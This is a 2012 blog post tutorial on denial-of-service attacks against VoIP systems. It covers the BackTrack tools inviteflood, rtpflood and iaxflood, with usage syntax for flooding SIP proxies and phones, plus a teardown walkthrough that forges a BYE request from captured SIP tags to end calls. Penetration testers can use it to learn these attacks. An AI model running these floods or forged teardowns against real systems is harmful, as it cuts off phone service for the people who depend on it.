Thursday, December 6, 2012

Denial Of Service



A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
 Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort  (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Read more: http://hoznimonzter.blogspot.com/2012/11/denial-of-service-dos.html#ixzz2EGWlpfjH

Tags: ,

0 Responses to “Denial Of Service”

Post a Comment

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

© 2013 Tenny Techno. All rights reserved.
Designed by SpicyTricks